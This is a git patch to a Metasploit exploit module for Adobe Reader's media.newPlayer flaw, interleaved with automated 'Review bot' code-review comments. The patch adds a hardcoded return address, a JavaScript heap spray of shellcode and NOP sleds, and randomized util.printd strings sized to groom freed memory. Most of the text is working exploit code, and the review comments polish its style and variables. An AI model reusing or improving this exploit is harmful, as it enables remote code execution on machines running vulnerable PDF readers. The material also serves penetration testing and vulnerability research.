From 2baa4a1efa5a088fa622baa32dec4ff282affeec Mon Sep 17 00:00:00 2001 From: Joshua Drake Date: Thu, 17 Dec 2009 05:16:35 +0000 Subject: [PATCH] port changes from Lurene to browser version git-svn-id: file:///home/svn/framework3/trunk@7901 4d416f70-5f16-0410-b530-b9f4589650da --- .../windows/browser/adobe_media_newplayer.rb | 22 ++++++++++++++----- 1 file changed, 16 insertions(+), 6 deletions(-) diff --git a/modules/exploits/windows/browser/adobe_media_newplayer.rb b/modules/exploits/windows/browser/adobe_media_newplayer.rb index 211524996e..bf3d76e218 100644 --- a/modules/exploits/windows/browser/adobe_media_newplayer.rb +++ b/modules/exploits/windows/browser/adobe_media_newplayer.rb @@ -66,9 +66,10 @@ class Metasploit3 < Msf::Exploit::Remote # reader 9.0.0 - untested # reader 9.1.0 - works # reader 9.2 - works (no debugger, no DEP) - [ 'Adobe Reader Windows Universal (JS Heap Spray)', + [ 'Adobe Reader Windows English (JS Heap Spray)', { - 'Size' => (0x10000/2) + 'Size' => (0x10000/2), + 'Ret' => 0x2e0031 } ], ], @@ -93,13 +94,22 @@ class Metasploit3 < Msf::Exploit::Remote # Make some nops nops = Rex::Text.to_unescape(make_nops(4)) + len = 72 + # Randomize variables rand1 = rand_text_alpha(rand(100) + 1) rand2 = rand_text_alpha(rand(100) + 1) - + rand3 = rand_text_alpha(rand(100) + 1) + rand4 = rand_text_alpha(len/2); + rand5 = rand_text_alpha(len/2); + + retstring = Rex::Text.to_unescape([target.ret].pack('V') + rand_text_alpha(len-4)) + + # The printd strings are 72 bytes (??) script = %Q| var #{rand1} = unescape("#{shellcode}"); var #{rand2} = unescape("#{nops}"); +var #{rand3} = unescape("#{retstring}"); while(#{rand2}.length <= #{target['Size']}) #{rand2}+=#{rand2}; #{rand2}=#{rand2}.substring(0,#{target['Size']} - #{rand1}.length); 
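Review bot: The new `rand4 = rand_text_alpha(len/2);` and `rand5 = rand_text_alpha(len/2);` lines carry trailing semicolons, which is not Ruby style and is inconsistent with the `rand3` line directly above them; drop the semicolons. The added comment `# The printd strings are 72 bytes (??)` records a doubt rather than a fact, and `len = 72` is otherwise undocumented even though `retstring` is sized from it as 4 bytes of `target.ret` plus `rand_text_alpha(len-4)`; either confirm the figure and state it plainly, or replace the `(??)` with `# TODO: verify expected printd string length`. In the first hunk on this line the target is renamed from Universal to English and gains `'Ret' => 0x2e0031`, but the version comments above that entry are not updated to say which build the value was checked against; a one-line comment there would save the next maintainer from guessing. The method these lines belong to starts before the hunk and continues after it.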
@@ -110,10 +120,10 @@ for(i=0;i<0x2000;i++) {
 memory[i]= #{rand2} + #{rand1};
 }
-util.printd("1.345678901.345678901.3456 : 1.31.34", new Date());
-util.printd("1.345678901.345678901.3456 : 1.31.34", new Date());
+util.printd("#{rand4}", new Date());
+util.printd("#{rand5}", new Date());
 try {this.media.newPlayer(null);} catch(e) {}
-util.printd("1.345678901.345678901.3456 : 1.31.34", new Date());
+util.printd("#{rand3}", new Date());
 |
 # Create the pdf
 pdf = make_pdf(script)
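Review bot: The `util.printd("#{rand4}", new Date());` and `util.printd("#{rand5}", new Date());` lines interpolate Ruby-generated strings into double-quoted JavaScript string literals, and nothing in the hunk records why that cannot break the literal; since `rand_text_alpha` yields only letters, a comment next to their definitions such as `# rand4/rand5 are alpha-only, so they are safe inside a JS string literal` would make that assumption explicit. On the last changed line `rand3` is placed inside quotes, whereas the previous hunk declares it as a JavaScript variable (`var #{rand3} = unescape("#{retstring}");`), so that declaration is never referenced in the visible script; this looks unintended and deserves either a cleanup or a comment stating which use is meant. The `%Q|` string that holds this script starts before the hunk.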